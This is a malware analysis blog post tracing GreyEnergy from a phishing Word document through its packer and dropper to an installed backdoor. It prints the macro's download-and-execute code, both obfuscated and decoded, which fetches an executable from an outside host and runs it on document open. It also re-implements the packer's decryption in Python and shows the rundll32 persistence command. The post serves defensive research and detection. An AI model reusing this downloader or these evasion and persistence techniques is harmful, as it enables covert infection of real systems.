Analyzing the GreyEnergy Malware: from Maldoc to Backdoor

Analyzing the GreyEnergy Malware: from Maldoc to Backdoor

GreyEnergy is an Advanced Persistent Threat (APT)  which has been targeting industrial networks in Ukraine and other Eastern European countries for the past several years. Last month we published an overview of the malware’s components and let our customers know they will receive alerts if GreyEnergy exists in their systems.

Since then, I have taken a deep dive into one of the infection methods of GreyEnergy, the phishing email that sends a malicious Microsoft Word document (Maldoc) to targeted organizations. This article provides a detailed description of how the malware works, from the moment that someone receives the phishing email, until the malware (backdoor) is installed in their system.

My comments are made from the point-of-view of a security analyst who’s trying to understand the functionality of GreyEnergy in a step-by-step way. They are intended to help the ICS security community stay on top of the latest threats and help others identify GreyEnergy in their industrial networks, or in the wild.

In conjunction with this article, Nozomi Networks has published a free tool for security analysts, the GreyEnergy Unpacker. It is an easy-to-run Python script that automatically unpacks the dropper and backdoor protected by the packer which is downloaded by the maldoc, facilitating further analysis.

GreyEnergy Maldoc to Backdoor Overview

GreyEnergy Malware Components
Diagram 1: The GreyEnergy malware components and high level flow, from Maldoc to Backdoor. (Click to enlarge)

The GreyEnergy ICS malware uses a common infection method, phishing emails with infected documents. However, the malware’s code is anything but common – it is well written and smartly put together and is designed to defeat detection by cybersecurity products. Diagram 1 shows the high level flow of the malware. The engineering techniques used to generate this flow are described in detail in this article.

GreyEnergy Stage 0 – Malicious Word Document

The attack starts when someone receives a malicious Word Document in their email inbox (SHA-1 177AF8F6E8D6F4952D13F88CDF1887CB7220A645).

The document is written in Ukrainian, and at first glance, it looks very suspicious. Not only are images present, but a security warning is clearly shown at the top of the page, related to the presence of macros.

Malicious Word Document
When the malicious Word document is first opened, this is what it looks like.

Scrolling down, the reader is presented with a fake interactive form. At this point the person continues to see the Security Warning at the top of the page, but they also see red text that advises them to enable the macros, i.e. click on the “Enable Content” button in the warning.

This is a clear attempt to trick the person into executing the malicious code.

The red warning
The red warning at the top of the page encourages viewers to interact with the form.
The red warning transalted in to English
Translated into English, the red warning text encourages viewers to enable macro execution.

Now let’s dive into a technical analysis to understand how this document works.

The first step is to start FakeNet-NG in order to capture all of the network traffic generated once the document has been opened. Once the document is opened, it tries to load a remote image; it happens even before enabling the macros.

In fact, the macros are disabled, and no code can be executed. The most obvious purpose of this behavior is to keep track of how many users, as a minimal metric of success, opened the document.

Highlighted code in detail
The highlighted code is shown in detail below.

This code is the HTTP GET request that is performed automatically by the malicious document.

GET /img/rKPGshUCwICOdqe1P8Ig5oere:dmykCedtG2zar.png HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0;WOW64; Trident/7.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: pbank.co.uaConnection: Keep-Alive .

Now it’s time to move on to the real malicious code. It is easily decompressed and extracted using the great tool oledump, as shown below:

C:\oledump_V0_0_38>python oledump.py maldoc.docA: word/vbaProject.bin A1:       513 'PROJECT' A2:        41 'PROJECTwm' A3: M   15178 'VBA/ThisDocument' A4:      3940 'VBA/_VBA_PROJECT' A5:      3656 'VBA/__SRP_0' A6:       655 'VBA/__SRP_1' A7:      5220 'VBA/__SRP_2' A8:       939 'VBA/__SRP_3' A9:       782 'VBA/dir'B: word/activeX/activeX13.bin B1:       128 '\x01CompObj' B2:        92 'contents'C:\oledump_V0_0_38>python oledump.py -s A3 -v -e maldoc.docFunction HashCheck()    On Error Resume Next    Set s = CreateObject(B64Dec("d3NjcmlwdC5zaGVsbA=="))    Set h = CreateObject(B64Dec("bXN4bWwyLnhtbGh0dHA="))    p = s.ExpandEnvironmentStrings("%temp%") & B64Dec("XFRWVU5TUzMuZXhl")    h.Open "get", B64Dec("aHR0cDovL3BiYW5rLmNvLnVhL2Zhdmljb24uaWNv"), False    h.send    With CreateObject(B64Dec("YWRvZGIuc3RyZWFt"))         .Type = 1         .Open         .Write h.responsebody         .savetofile p, 2         .Close    End With    s.Run pEnd FunctionSub Test()    Call HashCheckEnd Sub<cut>Private Sub Document_Open()  Call TestEnd Sub<cut>

(Part of the output has been removed in order to focus on the important parts of the code.)

The function Document_Open() is automatically executed once the user clicks on the button “Enable Content”. It calls the function Test(), and it in turn, calls HashCheck() which contains the malicious code.

The HashCheck() function is a common downloader found in most malicious macros. Its main purpose it to download a malware component from a remote location, store it inside the system and finally, execute it.

The attacker tried to obfuscate the strings using Base64 encoding, however, that encoding system can be easily reversed. The main purpose was not to protect the strings, but rather avoid pattern-based detection performed by cyber security products. The following code snap shows the downloader’s decoded strings:

Function HashCheck()    On Error Resume Next    Set s = CreateObject("wscript.shell")    Set h = CreateObject("msxml2.xmlhttp")    p = s.ExpandEnvironmentStrings("%temp%") & B64Dec("\TVUNSS3.exe")    h.Open "get", B64Dec("http://pbank[.]co[.]ua/favicon.ico"), False    h.send    With CreateObject("adodb.stream")         .Type = 1         .Open         .Write h.responsebody         .savetofile p, 2         .Close    End With    s.Run pEnd Function

The macro connects to the remote host: http://pbank[.]co[.]ua/favicon[.]ico and downloads a packed dropper designed to implant a persistent backdoor inside the system.

The executables of both the dropper and the backdoor are contained inside the packer itself, encrypted with a custom algorithm and compressed with a variant of LZW.

Let’s continue the analysis to find out how the packer works.

GreyEnergy Stage 1 – Packer

The packer (SHA-1 51309371673acd310f327a10476f707eb914e255) downloaded by the Word document is a C++ 32-bit Windows executable compiled on 2012-01-17 03:24:07 (in accordance with the PE header).

The executable is not signed or protected using any known packer, but contains a massive amount of anti-analysis techniques spread throughout the code, which are described below. The PE header and the sections do not contain anything indicating anomalies or packed code.

No suspicious indicators found
No suspicious indicators are found in the executable’s sections.

What is a packer? It’s an executable that encrypts and compresses another executable inside it, implementing varied anti-analysis techniques to make it very difficult to investigate and understand.  Packers are legitimately used to protect code that is the intellectual property of a person or company. In this case, however, the packer is used by the threat actor to hide the malware. It uses a lot of techniques to make it hard for the security analyst to identify the true malicious code.

How do you recognize a packer? Usually a packer has the following characteristics and capabilities. It:

  • Unpacks the original executable into memory
  • Resolves imports of the original executable
  • Relocates the binary
  • Transfers the execution to the original entry point
  • Contains few imports
  • Includes specific packer sections (like UPX0)
  • Involves abnormal sections sizes
  • Uses anti-analysis techniques, largely involving:
  • anti-debugging
  • anti-VM
  • junk code
  • so much more

Let’s go deeper into the analysis to understand what characteristics flag the executable as a packer.

Overlay Data

Observing the file closely, I noticed that the executable is carrying some data encrypted at the end of itself (overlay), starting at the raw offset 0xD800 (SHA-1 overlay data BD67AE6C9C4C5DEE10FD8E889133427BF42D0580).

The first assumption, confirmed during the analysis, is that the data appended at the end of the file is an additional component that is decrypted somehow during run-time. This is not necessarily a malicious indicator, because several Windows Installers uses overlays to store data to be installed inside a system. But, it could be a piece of the puzzle.

Data appended to the end of the file
Shown above is data appended to the end of the file and not presented in the PE header.

Static Analysis

Opening the dropper in IDA Pro, it’s immediately evident that the executable has been compiled using several anti-analysis techniques like junk code, anti-forensics, overlapping instructions and a massive use of JMPs. It could be an indicator that the analyzed file is a packer or, in general, is code that the developer wants to protect.

That’s not enough evidence yet, though, that there is malicious code inside.

Junk code, overlapping instructions and widespread use of JMPs.
This sample shows junk code, overlapping instructions and widespread use of JMPs.

Even if a static analysis approach would be feasible, I decided to focus on using a dynamic analysis approach, in order to speed up the investigation.

From this point forward, the information was obtained by debugging the malware with the excellent x64dbg.

Hardcoded Imports

The most important WinAPIs called by the packer are not contained in the PE import table, since the attacker decided to load them at runtime. The API names are pushed onto the stack using a mov instruction, without using any kind of obfuscation technique.

A mov instruction is used to push API names onto the stack
A mov instruction is used to push API names onto the stack.

Once the API’s name is loaded into memory, the malware needs to find where the related code is actually located in memory. As the libraries needed are already loaded in the process address space, the malware parses its PE header to access the export table and, subsequently, finds the right API address.

GreyEnergy parses the PE header to access the export table of kernel32.dll
GreyEnergy parses the PE header to access the export table of kernel32.dll, which is loaded into memory.

Using this method, addresses for the following APIs are identified:

  • CreateFileW
  • GetFileSize
  • LocalAlloc
  • ReadFile
  • CloseHandle

The malware implements a basic anti-forensic technique by overwriting all strings with zeros, after the strings have been loaded in memory.

The algorithm is simple and consists of overwriting all bytes of the string with a byte provided by the wipe function (fixed to 0x00 in the sample analyzed).

The wipe algorithm overwrites the string “GetFileSize” with 0x00s
The wipe algorithm overwrites the string “GetFileSize” with 0x00s.

Thus far there are multiple indicators that strongly suggest that the binary is a packer:

  • Apparently encrypted overlay
  • Anti-analysis techniques
  • APIs manually resolved by parsing the PE header
  • Strings hardcoded inside the code and overwritten with 0x00s after use

Accessing the Overlay Data

As suggested at the start of the analysis, the malware is now trying to access the data appended at the end of the file. In order to do that, it copies itself inside the memory with the purpose of parsing the PE header. It locates the exact offset where the overlay starts using the five APIs previously identified.

The first thing the malware needs to do, is access itself using CreateFileW, which returns a handle to the opened file.

The malware gets the handle 0xC8
The malware gets the handle 0xC8, which represents a link to itself on the disk.

The second thing required is the exact size of the executable, to know how much space to allocate in memory. The API GetFileSize is used to pass the size parameter of the file obtained earlier.

The second parameter 0x00 passed is a pointer to the variable where the high-order doubleword of the file size is returned. In this case it was set to NULL, because the application did not require the high-order doubleword.

The malware gets the size of its own executable.
The malware gets the size of its own executable.

Now that the malware has a handle to itself on the disk, and the exact size in bytes of the executable, it is ready to allocate space inside the memory for itself.

At this point there are strong indicators that what we are looking at is a packer, because of the overlay access and because of the widespread anti-analysis techniques used throughout the code.  However, we could be looking at something like an installer stub accessing the overlay.

The API LocalAlloc allocates bytes on the heap, initializing them to 0x00 because the parameter LMEM_ZEROINIT (0x40) is used during the call. The function returns the address of the allocated memory in the register EAX, in this case it is 0x00526E68.

Mmalware is allocating enough space in memory to store the hidden executable
Here the malware is allocating enough space in memory to store the hidden executable.

At this point the suspected packer has the address in memory where it will store itself. The next step is to read the file from the disk and store it in the allocated memory space. To do that, the following important information is involved:

  • 0xC8 → handle to the file to read
  • 0x00526E68 → address of the allocated memory
  • 0x1D000 → size of the file (amount of data to read)
The data contained inside the executable on the disk is copied into memory.
The data contained inside the executable on the disk is copied into memory.

The final step performed by the malware is to close the handle using the API CloseHandle. The handle 0xC8 is released and is no longer usable.

Now that the malware has copied itself into memory, it needs to point at the overlay data somehow. In order to do that, it will manually parse the PE header, traveling through the sections. Before going ahead, let’s take a look at how the PE file is formed.

The red box in the image below shows all the categories contained inside the header.  Each of them contains several fields describing specific useful information like the entry point of the executable, the APIs called, the compilation timestamp, how the data is structured inside the file and so on.

The last part of the PE header is the Section Headers, which describes how the file’s sections are organized, including their sizes and offsets.

Overview of the structure of the internal executable.
Overview of the structure of the internal executable.

Accessing the last entry, representing the section called .rsrc, it’s possible to extract the offset start point and the section size. Knowing this information, it’s possible to calculate the exact address where the section ends:

  • 0xD600 → Raw Address where the section is located
  • 0x200 → Raw Size of the section

At the bottom of the image, it shows the section ending with the common padding text PADDINGXX.

Doing a simple addition, 0xD600 + 0x200 = 0xD800, it’s possible to determine where the file ends and where the appended data starts.

Let’s find out what’s present at that offset using a hex editor:

PE header + appended data
Shown above is the end of the file, as described in the PE header + appended data.

There it is! The suspicious overlay data noticed at the beginning of the analysis starts exactly at the end of the .rsrc section. Using that strategy, the malware is going to parse the PE header, iterating over all the sections and performing the addition on the last section. When done, it obtains the right overlay offset.

Starting from that offset, the malware reads 40 bytes that will be used to initialize an array of 256 bytes through the following small algorithm (re-implemented in Python):

def init_keymap(key):      ikey = 0      keysum = 0      keymap = bytearray([i for i in range(256)])      for idx in range(len(keymap)):          keysum = (keysum + key[ikey] + keymap[idx]) % 256          keymap[idx], keymap[keysum] = keymap[keysum], keymap[idx]          ikey = (ikey + 1) % len(key)      return keymap

The initialized array is required by the decryption algorithm because it is the secret key (from now on referred to as keymap) needed to decrypt the protected overlay data.

The decryption function uses the keymap internally, taking as an argument the output buffer. This provides the location for the decrypted data, and the length of the buffer.

Location for the decrypted data
The location for the decrypted data and the length of the buffer are identified.

The decryption algorithm is very simple and has been re-implemented with the following Python code:

def decrypt(cipher, keymap):ikey = 1keysum = 0for idx in range(len(cipher)):keysum = (keysum + keymap[ikey]) % 256keymap[ikey], keymap[keysum] = keymap[keysum], keymap[ikey]keymap_idx = (keymap[ikey] + keymap[keysum]) % 256cipher[idx] ^= keymap[keymap_idx]ikey = (ikey + 1) % 256return cipher

Having a look at the beginning of the output buffer, it is immediately clear that the data contains an executable, because the presence of the signature 0x4D5A. Looking closely, however, there are several unexpected bytes between the recognized patterns, indicating that the data has not been completely reconstructed yet.

Usually, the PE header contains several sequences of zeros, which are not present in the decrypted buffer, suggesting that it could be compressed somehow.

This time my assumption is quickly confirmed, because after about ten instructions, there is a function with parameters from the offset of the decrypted data. The parameters indicate the function’s size and include a pointer to a new buffer (previously allocated). After this function’s execution, the new buffer contains a valid PE header, confirming that the data was compressed.

Uncompressed binary
The buffer containing the uncompressed binary is identified.

Next, the packer points to the uncompressed buffer, parses the PE header, and iterates all the sections again. The technique is very similar to the previous one. However, this time the goal is to point surgically to the start of the appended data.

Accessing the overlay data reveals that it contains a second PE header, which is the real malicious component (backdoor) waiting to be installed inside the victim’s system.

Flow executed by the packer
Diagram 2: The flow executed by the Packer includes decryption and decompression of the Dropper and Backdoor. (Click to enlarge)

At this point it’s possible to identify two specific components from the unpacked data, the dropper and the backdoor.
The next step is to execute the dropper in-memory without storing it inside the filesystem. To achieve that goal, the following steps are taken by the binary:

  • A new buffer is allocated in the virtual address space of the packer using the API VirtualAlloc. Then, all the sections of the dropper are copied inside it.
  • All the imports contained inside the PE header are resolved using the APIs LoadLibrary and GetProcAddress.
  • All the sections’ permissions are set in accordance with the PE header using the API VirtualProtect
  • The dropper binary is relocated in according with the .reloc section

Once all the steps are done, the dropper executable is correctly loaded into memory waiting to be executed. This is the final confirmation that the binary is a packer, because it meets all the primary characteristics of packers.

The packer extracts the entry point address (used to describe where the code starts inside the binary) from the PE header of the dropper, and jumps to it using an unconditional instruction JMP. Once achieved, the execution flow migrates from the packer’s code to the dropper’s code.

It’s easy to notice it, because the execution flow leaves the packer’s code section allocated at the offset 0x0040100, and jumps to a completely different one, 0x0021964. This last offset was allocated by the OS using a VirtualAlloc API, so it could be different each time it’s executed.

The execution flow from the packer to the dropper code
The execution flow jumps from the packer to the dropper code using the JMP instruction.

GreyEnergy Stage 2 – Dropper
The dropper is a very small piece of code whose purpose is to drop the real malware inside the victim’s system. A part of the dropper’s mission is to make the malware persistent, so it will survive an eventual system reboot. Luckily the dropper is not protected against analysis as the packer was, so it is easier to follow the logic flow.

Single Execution

The malicious malware has probably been developed to execute only once, because the dropper checks if another process is running with a mutex named using a unique name in the system. The name is obtained dynamically using the API GetCurrentHwProfileA, which uses the field szHwProfileGuid as the parameter opening the mutex. If it already exists, the process terminates itself.

Dropper checks for the presence of a unique name
The dropper checks for the presence of a unique name, using the field szHwProfileGuid, and terminates if it’s found.

String Encryption

All the strings used by the dropper are encrypted and stored inside the section .rdata, which usually contains all the read-only data.

The algorithm to decrypt the strings is a simple XOR instruction. In this case though, every string has a specific 4-bytes XOR key that is declared at the beginning of the string itself. Even though a 4-bytes key is used by the analyzed sample, the data structure looks to support a XOR key up to 8-bytes (in the screenshot below is possible to see 0x00 repeated 4 times).

Decryption of the Dropper strings
The decryption of the Dropper strings uses a 4-byte XOR key, although the data structure supports up to an 8-byte key.

The XOR-based algorithm chosen to encrypt the strings is easy to break, but it does protect against string extraction analysis. If the suspicious strings were stored in cleartext, they could trigger alarms by pattern-based security systems.

Malware Dropping

The dropper obtains the path to the Windows tool rundll32.exe dynamically, which is an indicator that the malicious component is going to execute is a DLL file. The backdoor is dropped inside the directory %APPDATA%/Microsoft/ using a random GUID and the extension .db. Changing the file extension is a basic social engineering technique to trick the victim into thinking that the file is something harmless — while it actually contains malicious executable code.

Malicious backdoor with a .db file extension
The malicious backdoor has the file extension .db, to trick the victim into thinking the file is harmless.

Set Persistence

In order to survive a system reboot, the dropper creates a link file with a blank name %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\          .lnk (10 space characters) pointing to the malicious file dropped in %APPDATA% using the following command:

C:\Windows\SysWOW64\rundll32.exe {4591E270-719A-4B01-A63C-C5B75CF04830}.db,#1

As the dropped backdoor {4591E270-719A-4B01-A63C-C5B75CF04830}.db is a DLL file, it needs a stub able to run its exported function. In order to do that, the dropper uses the system utility rundll32.exe to call the function #1 exported by the DLL.

Execute the Installed Backdoor

Finally, the dropper is ready to execute the real piece of malware installed inside the victim’s system. The commands used to run the backdoor are the same as those used to ensure survival of a reboot:

C:\Windows\SysWOW64\rundll32.exe {4591E270-719A-4B01-A63C-C5B75CF04830}.db,#1

Once the backdoor is executed inside the system, the dropper does a final action to cleanup traces of the infection. It uses the API ShellExecuteW to execute the following command in the system’s shell:

windir-code-image-02-01

The most important part of the string above is the command del, which deletes the packer’s executable that started the execution flow described so far.  The command ping sends 4 ICMP packets to the system’s loopback interface, and seems to be a decoy to cover up the fact that the packer will be deleted from the filesystem.

The last API called is ExitProcess, which terminates the execution of the packer after the dropper’s code has been executed inside its address space.

A Stealthy Infection with Potentially Dangerous Consequences

Having completed my analysis, it’s evident that the GreyEnergy packer does a great job of slowing down the reverse engineering process. The techniques used are not new, but both the tools and the tactics employed were wisely selected.

For example, the threat actor chose to implement custom algorithms that are not too difficult to defeat, but they are hard enough to protect the malicious payload. Additionally, the broad use of anti-forensic techniques, such as the wiping of in-memory strings, underline the attacker’s attempt to stay stealthy and have the infection go unnoticed.

To learn how the GreyEnergy attack proceeds post infection, see my earlier summary blog, or refer to the initial, detailed ESET report. Notably, GreyEnergy appears to have been used for espionage campaigns only, as it does not include any module capable of infecting industrial control systems.

However, ESET concludes its report with ‘GreyEnergy is an important part of the arsenal of one of the most dangerous APT groups that has been terrorizing Ukraine for the past several years.” Its possible GreyEnergy could evolve to include modules capable of damaging critical infrastructure in the future.

My work reverse engineering GreyEnergy informs the threat detection capabilities of Nozomi Networks offerings, including our new Threat Intelligence service. It uses advanced techniques for identifying GreyEnergy, or its variants, on industrial networks.

Free Tool Facilitates Further GreyEnergy Analysis

As a direct result of this analysis, I have developed a GreyEnergy Unpacker. It’s a Python script that automatically unpacks both the dropper and the backdoor, extracting them onto a disk and is freely available from Github. Using it saves you the reverse engineering work explained here, and is intended to help facilitate further GreyEnergy analysis.

Update February 2019: Research Paper Now Available

Since the publication of this blog, I performed additional analysis of the GreyEnergy stages described above. My deepest investigation was done on the packer, and my comprehensive reverse engineering analysis is provided in the research paper available below.

Also linked to below are:

  • A further blog article on this topic, that summarizes the techniques used by the packer to conceal its true functionality
  • An updated GitHub link that now provides two GreyEnergy tools. The additional new tool is the GreyEnergy Yara Module, which determines whether a file processed by Yara is the GreyEnergy packer or not.